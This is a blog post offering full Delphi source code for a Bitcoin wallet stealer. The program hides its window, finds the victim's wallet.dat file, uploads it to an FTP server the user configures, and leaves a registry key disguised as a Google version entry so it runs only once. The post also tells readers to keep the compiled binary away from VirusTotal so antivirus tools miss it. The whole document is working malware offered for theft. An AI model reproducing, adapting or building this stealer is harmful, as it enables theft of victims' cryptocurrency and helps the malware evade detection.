Tuesday, 19 July 2016

Bitcoin Wallet Hack [Source Code Included]

This is a free and open source Bitcoin Hack, you will be glad if you are smart enough to use it correctly

This is a console application. The engine will try to locate the "Wallet.dat" file and upload it on a FTP server. The source-code if fully commented. You have just 4 lines to customize with your FTP infos. This application uses Indy FTP component to proceed the upload.
To avoid useless duplicate Wallet on your FTP, this application will add a key in the registry after first upload. At the next launch, the application will check if the key already exists. And if yes, it will not try to steal the Wallet. It's simple and working !

File is clean 1/33: http://nodistribute.com/result/lEGoniQOs2tk45K
DO NOT SCAN YOUR EXE USING VIRUS-TOTAL (prefer http://nodistribute.com)

send me a message if you need 

additional help. 

-nextbotking@gmail.com
Save the code below in a file named "dbs.dpr"
program dbs;

// Bitcoin Stealer
// developed by Jimmy
// for http://exclusivehackingtools.blogspot.com

{$IF CompilerVersion >= 21.0}
  {$WEAKLINKRTTI ON}
  {$RTTI EXPLICIT METHODS([]) PROPERTIES([]) FIELDS([])}
{$IFEND}

uses
  Windows, System.SysUtils, System.Classes, ShlObj, IdFTP, Registry;

// Function to set the window state hidden
function GetConsoleWindow: HWND; stdcall; external kernel32 name 'GetConsoleWindow';

// Function to get the AppData path
function AppDataPath: String;
const
  SHGFP_TYPE_CURRENT = 0;
var
  Path: array [0 .. MAXCHAR] of char;
begin
  SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, SHGFP_TYPE_CURRENT, @Path[0]);
  Result := StrPas(Path);
end;

// Function to check a file size
function FileSize(FileName: wideString): Int64;
var
  sr: TSearchRec;
begin
  if FindFirst(FileName, faAnyFile, sr) = 0 then
    Result := Int64(sr.FindData.nFileSizeHigh) shl Int64(32) + Int64(sr.FindData.nFileSizeLow)
  else
    Result := -1;

  FindClose(sr);
end;

// Function to generate random string
function RandomString(PLen: Integer): string;
var
  str: string;
begin
  Randomize;
  str := 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
  Result := '';
  repeat
    Result := Result + str[Random(Length(str)) + 1];
  until (Length(Result) = PLen);
end;

// ============================================================================

var
  Debug: Boolean;
  FTP: TIdFTP;
  REG: TRegIniFile;
  RegPath, RegValue, RegCurrentValue, Path, UploadPath, FileName: String;
  Error: String;

begin
  // The window should be hidden without using this API
  ShowWindow(GetConsoleWindow, SW_HIDE);

  // Debug or build release ?
  Debug := True;

  // Set registry key value (random)
  RegValue := '6556';

  // At the end of the first execution we will write a key in the registry.
  // Now we will try check if the key exists. If yes, it means
  // that the wallet has already be stolen. Avoid useless duplicates.
  try
    REG := TRegIniFile.Create;
    REG.RootKey := HKEY_CURRENT_USER;
    REG.OpenKeyReadOnly('Software');
    RegCurrentValue := REG.ReadString('Google', 'Version', '');
    REG.CloseKey;
    REG.Free;
  except
  end;

  // Check if wallet has been already stolen (to avoid duplicates)
  if not(RegCurrentValue = RegValue) then
  begin
    try
      // Generate path to Bitcoin wallet file
      if Win32MajorVersion >= 6 then
        // Microsoft Windows Vista and newer
        Path := ExpandFileName(AppDataPath + '\..\Roaming\Bitcoin\wallet.dat')
      else
        // Microsoft Windows XP
        Path := ExpandFileName(AppDataPath + '\..\Bitcoin\wallet.dat');

      // If wallet file exists, check the FileSize (skip large file > 10MB)
      if FileExists(Path) then
        if FileSize(Path) < 10000000 then
        begin
          // Generate a random filename
          FileName := RandomString(20) + '.dat';

          // Initialize upload via Indy FTP component
          FTP := TIdFTP.Create();
          FTP.ConnectTimeout := 20000;
          FTP.ReadTimeout := 20000;

          // Setup with your FTP details
          FTP.Host := 'ftp.host.com';
          FTP.Username := 'username';
          FTP.Password := 'password';
          UploadPath := 'www/';

          // Connect and upload
          if not Debug then
          begin
            FTP.Connect;
            FTP.Put(Path, UploadPath + FileName);
          end;

          // After upload attempt, disconnect and free the FTP component
          FTP.Quit;
          FTP.Disconnect;
          FTP.Free;

          // Try to add a key to registry to avoid double execution
          try
            REG := TRegIniFile.Create;
            REG.RootKey := HKEY_CURRENT_USER;
            REG.OpenKey('Software', True);
            REG.WriteString('Google', 'Version', RegValue);
            REG.CloseKey;
            REG.Free;
          except
          end;
        end;
    except
      // Catch error, you never know...
      on E: Exception do
        Error := E.ClassName + ': ' + E.Message;
    end;
  end;

end.

Source-code with syntax color :

No comments:

Post a Comment